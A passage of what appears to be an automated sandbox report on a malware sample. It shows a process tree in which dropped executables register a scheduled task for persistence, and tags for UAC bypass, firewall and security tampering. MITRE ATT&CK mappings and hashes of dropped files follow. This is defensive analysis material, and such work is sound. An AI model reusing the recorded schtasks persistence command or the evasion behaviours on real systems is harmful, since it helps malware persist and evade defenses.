C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4204 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp269E.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"{path}"4⤵PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:1720
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3904
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:2412
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2284
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca1⤵PID:4432
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:4896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1392
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1404
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:1980
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5665f21a9b6730aa08e62473e481b8c55
SHA1717d52e75ac16bf032299828dd61c86af281eb43
SHA256dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e
-
Filesize
3.0MB
MD5ab43042da67bbac3ee18248ee40d4c7e
SHA110aa258234918a4231ee9a5c222f27c8a9a4d69d
SHA256fda0366362c09fe1538c6ccca5a67aba4ee3f15da38ba91276dcab13dc7ad4f1
SHA512b9657448c677ee458c63d09e05edcfdb0e92168155bc39b8c34092b17dd877232d99680fbf6e952b884dd294300d4f0c56ab6f93d07f506bc017f3988ef8538c
-
Filesize
919KB
MD5a102b1ee34e498fb8458a6be30ba15e7
SHA1b586c1bc68a67b6fc7762d5ce7ecae8343d8e006
SHA2560b533b19d6e78fdb0e9c7c3616da7641f3b8f9a2761da345efba417a15cc72c6
SHA5120b49ce905e76f643019643e9ac42aaf31cdf50ed8294420a936ccce0eca0749d1baddb3c80a28a24ca6f91cd6ff044ec6dea9b4bd5e36c65341395199848483b
-
Filesize
12.5MB
MD5d8865f463ff9f148fc62ca1a0e3db0fd
SHA11bdd1e03a7002261810ca0d39d785d53c2b2bb3c
SHA256fd56f3d15c22eacf304b5ecd000a39158f7dd43a139d22140f28d5d621fc1fc7
SHA51283e01c03754a56b546514e8bd15d84fcf5c996f472189a492070d57edbadd16e07dc17180254508589f9b56221cbb24946bc6d281bb04a000f5375d9b6b7e937
-
Filesize
1KB
MD5a7faa1243898bb160dc53c840f4e36a6
SHA1c599642d9e337523e4f1722f9dda85b9953b9145
SHA256f64544ba37b0287d951068172e8c2a5c7c75296e1a1ec0077af753bcf25d09d1
SHA5128b90a2b38158b71bb1c55a80ca737f42297c2a58101c087ec34da270bbd2f7845c1d9140c08e1b68e79837a54b7184e5e1a83504ecc584a0074c3274a1df627e
-
Filesize
14KB
MD5325b008aec81e5aaa57096f05d4212b5
SHA127a2d89747a20305b6518438eff5b9f57f7df5c3
SHA256c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b
SHA51218362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf
-
Filesize
5KB
MD59384f4007c492d4fa040924f31c00166
SHA1aba37faef30d7c445584c688a0b5638f5db31c7b
SHA25660a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA51268f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf
-
Filesize
11KB
MD5c17103ae9072a06da581dec998343fc1
SHA1b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f
-
Filesize
13KB
MD529858669d7da388d1e62b4fd5337af12
SHA1756b94898429a9025a04ae227f060952f1149a5f
SHA256c24c005daa7f5578c4372b38d1be6be5e27ef3ba2cdb9b67fee15cac406eba62
SHA5126f4d538f2fe0681f357bab73f633943c539ddc1451efa1d1bb76d70bb47aa68a05849e36ae405cc4664598a8194227fa7053de6dbce7d6c52a20301293b3c85f
-
Filesize
4KB
MD57579ade7ae1747a31960a228ce02e666
SHA18ec8571a296737e819dcf86353a43fcf8ec63351
SHA256564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b
-
Filesize
4KB
MD5d25102051b33f61c9f7fb564a4556219
SHA1c683964c11d5175171bd009cb08f87592c923f85
SHA256e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
SHA5128828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0
-
Filesize
9KB
MD5c10e04dd4ad4277d5adc951bb331c777
SHA1b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e
-
Filesize
1KB
MD5d59570d1684c23b4ac8382a8ee20e096
SHA1a3027352e6ff1138652462936442d6ed03888826
SHA2561ceb22ffeb0df77e03de3be0f94a348a71b9bf5001eec55a140a02d04f3cd16c
SHA5127bbc949cecc0b12bee33ddbf435d1fd40f170142ee0de68441f35c4f71a126983ac44fb40c6efdc9d9913b8210142ee520bf6ebe7b1aa2b62897a57205d38a2b
-
Filesize
257B
MD59ffdd056d650059d3a423a4948692cd1
SHA1b77f720c12e6d3114384b5a55a9a13c35019a62a
SHA25680d69ec2f2b5906f27dbc752932ab45030b91cb4eefc34eb3354642b0fe9041e
SHA512124e3df2202dfd3ae5d628e918092340c0ba4a2cfd3a61bb14d37f1eda87ebac2f2b74c95e55bdc2d2299b055a7e0aa6041211d663cd5f9b2e5eaee0410f8f43